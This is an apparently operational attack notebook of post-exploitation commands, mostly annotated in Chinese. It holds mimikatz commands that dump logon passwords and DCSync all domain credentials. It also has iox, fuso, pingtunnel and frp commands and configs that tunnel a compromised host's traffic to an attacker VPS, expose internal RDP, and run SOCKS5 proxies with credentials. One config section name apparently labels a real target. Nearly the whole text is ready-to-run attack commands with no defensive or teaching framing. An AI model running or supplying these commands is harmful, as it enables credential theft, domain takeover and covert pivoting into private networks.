mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > C:\windows\temp\log.txt

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

./iox proxy -l 1080

VPS 监听(//将1080端口监听到的流量转发至50054端口):
nohup ./iox proxy -l 50054 -l 1081 -k 3211 > iox.log &  

在目标主机执行(//启动代理服务并发送至VPS 50054端口)：
./iox proxy -r VPSIP:50054 -k 3211  

然后本地socks5代理：socks5://vps:1081

vps执行:
nohup ./iox fwd -l *8888 -l 33890 -k 22222

目标机器执行:
iox.exe fwd -r 192.168.0.1:3389 -r *VPSIP:8888 -k 22222

随后连接 VPS:33890 即可访问内网 3389

VPS：
./fus

//被控机
./fuc.exe VPSIP 6722 --socks

1. 端口转发
fuc --forward-host xxx.xxx.xxx.xxx --forward-port
   --forward-host: 转发到的地址
   --forward-port: 转发到的端口
   如: 转发流量到内网 10.10.10.4:3389
   > fuc --forward-host 10.10.10.4 --forward-port 3389

2. socks5:
fuc --socks --su --s5p xxx --s5u xxx
   --su: 可选的, 开启udp转发, 
   --s5p: 可选的, 认证密码, 默认不进行密码认证
   --s5u 可选的, 认证账号, 默认账号 anonymous
   --socks: 可选的, 开启socks5代理, 未指定--su的情况下不会转发udp
   如: 开启udp转发与密码认证
   > fuc --socks --su --s5p 123 --s5u socks
   此时, 已开启udp转发,连接密码为 "123",账号为 "socks"

3. 指定穿透成功时访问的端口
   fuc -b xxxx
   -b | --visit-bind-port: 可选的, 默认随机分配
   如: 访问外网端口 8888 转发到内网 80
   > fuc --forward-port 80 -b 8888

4. 桥接模式 注意: 目前不能转发udp
   fuc --bridge-listen xxxx --bridge-port xxx 
   --bridge-listen | --bl: 监听地址, 默认 127.0.0.1
   --bridge-port | --bp: 监听端口, 默认不启用桥接
   如: 开始桥接模式,并监听在9999端口, 本机ip地址为: 10.10.10.2
   > fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 开启桥接
   > fuc 10.10.10.2 9999 # 建立连接

   级联: 
   > fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 第一级, IP: 10.10.10.2
    > fuc --bridge-listen 0.0.0.0 --bridge-port 9991  10.10.10.2 9999 # 第二级, IP: 10.10.10.3
     > fuc 10.10.10.3 9991 # 最终 

5. 将连接信息通知到 Telegram 或其他
   fus --observer "program:[arguments]"
   --observer: 建立连接或断开连接时的钩子
   如: 使用bash脚本将连接信息通知到tg
   > fus --observer "/bin/bash:[telegram.sh]"

6. 指定客户端与服务端通信的端口
   fuc --channel-port 8888 ...
   --channel-port: 可选的, 客户端与服务端通信端口, 默认随机

nohup ./pingtunnel -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:10000 -sock5 -1 -noprint 1 -nolog 1 >p.log &
nohup ./frpc -c frpc.ini > fff.log &

[common]
server_addr = 127.0.0.1
server_port = 10000
token = PassW0Rd

[zhaoshangju_10078]
type = tcp
remote_port = 10015
plugin = socks5
plugin_user = thIsuserAS
plugin_passwd = Passweqwe0Rm
use_encryption = true

./pingtunnel -type server
./frps -c frps.ini